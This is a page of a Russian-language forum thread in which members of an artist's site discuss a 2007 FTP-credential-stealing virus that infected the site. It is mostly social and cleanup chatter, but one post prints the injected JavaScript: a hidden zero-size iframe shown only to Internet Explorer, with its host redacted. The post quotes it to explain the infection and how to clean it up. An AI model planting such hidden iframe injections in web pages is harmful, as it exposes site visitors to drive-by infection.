Здравствуйте, гость ( Вход | Регистрация )

4 страниц V  < 1 2 3 4 >  
Reply to this topicStart new topic
> Мой профсайт или "ура, заработало!!!"(с)
Хольгер
сообщение 21.2.2007, 18:17
Сообщение #31


Istyar
***

Группа: Участники
Сообщений: 2190
Регистрация: 8.12.2005
Пользователь №: 44



Посмотрел новые картины -- нравится очень!!!


--------------------
Lutar e vencer!
Go to the top of the page
 
+Quote Post
Мимохожий__*
сообщение 23.3.2007, 17:47
Сообщение #32





Гости






ВАЖНО: ДО ЧАСУ НОЧИ (С 23 НА 24 МАРТА) САЙТ РАБОТАТЬ НЕ БУДЕТ.

Причина: ftp-infector.
Все, кто просматривал что-либо с сайта 22-го вечером и 23-го числа, большая просьба, проверьте технику.
Go to the top of the page
 
+Quote Post
Мимохожий__*
сообщение 23.3.2007, 17:47
Сообщение #33





Гости






А, да. Это я, Гэл.
Go to the top of the page
 
+Quote Post
Мимохожий__*
сообщение 24.3.2007, 0:01
Сообщение #34





Гости






Работает. Вроде бы чисто. smile.gif
Go to the top of the page
 
+Quote Post
Аллор
сообщение 26.3.2007, 15:50
Сообщение #35


Недомайа
***

Группа: Админы
Сообщений: 5780
Регистрация: 14.5.2004
Из: Ангамалле
Пользователь №: 4



Гэл, пасиб!
Я тут вне аськи вообще, да и в сеть вылезаю раз в несколько дней... Вот приеду... happy.gif
Go to the top of the page
 
+Quote Post
Мимохожий_Гэл_*
сообщение 6.4.2007, 9:06
Сообщение #36





Гости






Хм. А чего будет, когда приедешь? Будем "пить по телефону"? wink.gif
Go to the top of the page
 
+Quote Post
Аллор
сообщение 6.4.2007, 11:34
Сообщение #37


Недомайа
***

Группа: Админы
Сообщений: 5780
Регистрация: 14.5.2004
Из: Ангамалле
Пользователь №: 4



(Гэл @ 6.4.2007, 7:06) *
Хм. А чего будет, когда приедешь? Будем "пить по телефону"? wink.gif

Может, наконец английской версией займемся...
А пить можно и не потелефону, кста, когда ты в наши края-то?wink.gif
Go to the top of the page
 
+Quote Post
Мимохожий__*
сообщение 18.4.2007, 19:43
Сообщение #38





Гости






Может, наконец английской версией займемся...
А пить можно и не потелефону, кста, когда ты в наши края-то?wink.gif


такими темпами скоро придется заниматься переделкой всего и вся снова. Итак, вся та же радость, волна номер два. Работать не будет до воскресенья - пока не доберусь до компа с полным бэкапом.

ps: Эол, Вы не могли бы сменить пароль? И выяснить заодно, кто сделал аплоад - дело в том, что я в начале недели не зря все снес, эту заразку (вирус то есть) хлебом не корми - дай пихнуть в html или php свой фрейм. А так как кто-то все перезалил - оно, понятное дело, появилось снова. Поэтому удаляю все во второй раз и надеюсь, что такого больше не случится - по крайней мере, пока я не почищу ВСЕ, что там может быть "infected".
Go to the top of the page
 
+Quote Post
Темный Эол
сообщение 18.4.2007, 23:08
Сообщение #39


Свиназгул
***

Группа: Админы
Сообщений: 896
Регистрация: 27.4.2004
Из: Рамот
Пользователь №: 1



Пароль сменить разумеется можно. А выяснять ничего не надо. Аплоад сделал я. Просто увидел что сайт отстствует, ну и залил тот бэкап, который у меня был. Прошу прощения, я поторопился, сначала надо было у вас спросить. unsure.gif А чего там заражено то было? Я сайт посмотрел и ничего такого не увидел.


--------------------
Свински просто!
Go to the top of the page
 
+Quote Post
Мимохожий__*
сообщение 19.4.2007, 9:27
Сообщение #40





Гости






(Темный Эол @ 18.4.2007, 21:08) *
Пароль сменить разумеется можно. А выяснять ничего не надо. Аплоад сделал я. Просто увидел что сайт отстствует, ну и залил тот бэкап, который у меня был. Прошу прощения, я поторопился, сначала надо было у вас спросить. unsure.gif А чего там заражено то было? Я сайт посмотрел и ничего такого не увидел.


Вирус: DrWeb опознал как VBS.Psyme (точнее не помню, но скорее всего 206 какой-нибудь)
Распространение: при открытии страницы посредством IE сохраняется в Temporary Internet Files; определяет доступные ftp аккаунты - из far, total commander и прочих файл-манагеров. Cоответственно, втихую копирует продукты своей жизнедеятельности туда, заражая .php и .html файлы. Собственно, он дописывает в конец файла вот это вот:

<!--start_frame0xf--//>
<script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln('<iframe
src="##########/index.php" frameborder=0 border=0 width=0 height=0 style="position: absolute; visibility: hidden"></iframe>');
}</script>
<!--end_frame0xf--//>

где тема с "#########/index.php" - (я намеренно прибил ссылку) видимо, система распространения вируса и есть.

Отслеживание: DRWeb начиная с версии 4.33 (с нормальной лицензионной базой) - точно.

Дополнение: он обходит рекурсивно все доступные каталоги. Так что "обсижен" им не только сам сайт, но и все "системные" фолдеры, где попадались файлы с указанным расширением. В первый раз я сливал на локал все и на локале же чистил - ну, дома проще, дома Sabayon стоит. Помогло. Сейчас, видимо, нужно будет либо скрипт писать либо так же, как и в первый раз, поступать.
Go to the top of the page
 
+Quote Post
Темный Эол
сообщение 19.4.2007, 17:26
Сообщение #41


Свиназгул
***

Группа: Админы
Сообщений: 896
Регистрация: 27.4.2004
Из: Рамот
Пользователь №: 1



Спасибо за пояснения. Не могли бы вы пояснить еще немножко? Я так понял что 24 марта вы почистили сайт от вируса и он стал работать нормально, так? А потом что, он опять появился и вы убрали все html странички?

А меня значит спасло то что я на сайт ходил фаерфоксом. smile.gif Проверился сейчас симантеком, он ничего не нашел. Нет, ну что за свинское счастье, оказывается я скачал себе бэкап содержащий вирус. blink.gif Сейчас посмотрел, во всех файлах есть указанный вами код. Я могу стереть его и залить обратно чистый бэкап. Будет ли этого достаточно? И нужна ли вообще моя помощь?


--------------------
Свински просто!
Go to the top of the page
 
+Quote Post
Мимохожий__*
сообщение 19.4.2007, 20:14
Сообщение #42





Гости






(Темный Эол @ 19.4.2007, 15:26) *
Спасибо за пояснения. Не могли бы вы пояснить еще немножко? Я так понял что 24 марта вы почистили сайт от вируса и он стал работать нормально, так? А потом что, он опять появился и вы убрали все html странички?


Именно. Кроме тех, которые не в public_html. Но их тоже чистить надо. А для того, чтобы вычистить все прочие сайты, на которые у меня был доступ по работе, писали скрипт, предварительно сменив пароли.

(Темный Эол @ 19.4.2007, 15:26) *
А меня значит спасло то что я на сайт ходил фаерфоксом. smile.gif

из-за - navigator.userAgent.indexOf('MSIE') != -1 - видимо, да.

(Темный Эол @ 19.4.2007, 15:26) *
Проверился сейчас симантеком, он ничего не нашел.


Ну, антивирусы всякие бывают. С чего ради, кстати, вирус у вас на машине должен быть? Пароль он один раз (24 марта) отловил, куда надо - заслал, так что без всякого постороннего участия... Хм... А на моем рабочем компе дырывеб тоже ничего не нашел. Хотя 24 марта - находил результативно.

(Темный Эол @ 19.4.2007, 15:26) *
Нет, ну что за свинское счастье, оказывается я скачал себе бэкап содержащий вирус.

Не факт. Он просто прошелся по незагаженным файлам, и все.

(Темный Эол @ 19.4.2007, 15:26) *
Сейчас посмотрел, во всех файлах есть указанный вами код. Я могу стереть его и залить обратно чистый бэкап. Будет ли этого достаточно? И нужна ли вообще моя помощь?


Нет, не будет. Нужно выкусать все html (htm) и php и проверить каждый. А потом перезалить - с корня начиная (на всякий случай). Что, собственно, я и собираюсь делать на выходных - если сеть будет. Но помощи буду всяко рад.
Go to the top of the page
 
+Quote Post
Темный Эол
сообщение 20.4.2007, 11:06
Сообщение #43


Свиназгул
***

Группа: Админы
Сообщений: 896
Регистрация: 27.4.2004
Из: Рамот
Пользователь №: 1



Сменил пароль, все html (htm) и php файлы очистил и залил по новой. Теперь лучше? rolleyes.gif


--------------------
Свински просто!
Go to the top of the page
 
+Quote Post
Аллор
сообщение 25.4.2007, 11:00
Сообщение #44


Недомайа
***

Группа: Админы
Сообщений: 5780
Регистрация: 14.5.2004
Из: Ангамалле
Пользователь №: 4



Вроде оно все открывается! пасиб вам!
Go to the top of the page
 
+Quote Post
Аллор
сообщение 31.10.2007, 14:27
Сообщение #45


Недомайа
***

Группа: Админы
Сообщений: 5780
Регистрация: 14.5.2004
Из: Ангамалле
Пользователь №: 4



Не удивляйтесь, это просто мой заказчик не может аттач открыть, так я ресурс форума в личных целЯх юзаю...
*сие моя халтура, еще не доделанная...*
Эскизы прикрепленных изображений
Прикрепленное изображение
Прикрепленное изображение
 
Go to the top of the page
 
+Quote Post

4 страниц V  < 1 2 3 4 >
Fast ReplyReply to this topicStart new topic
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



Текстовая версия    Сейчас: 16.4.2024, 9:19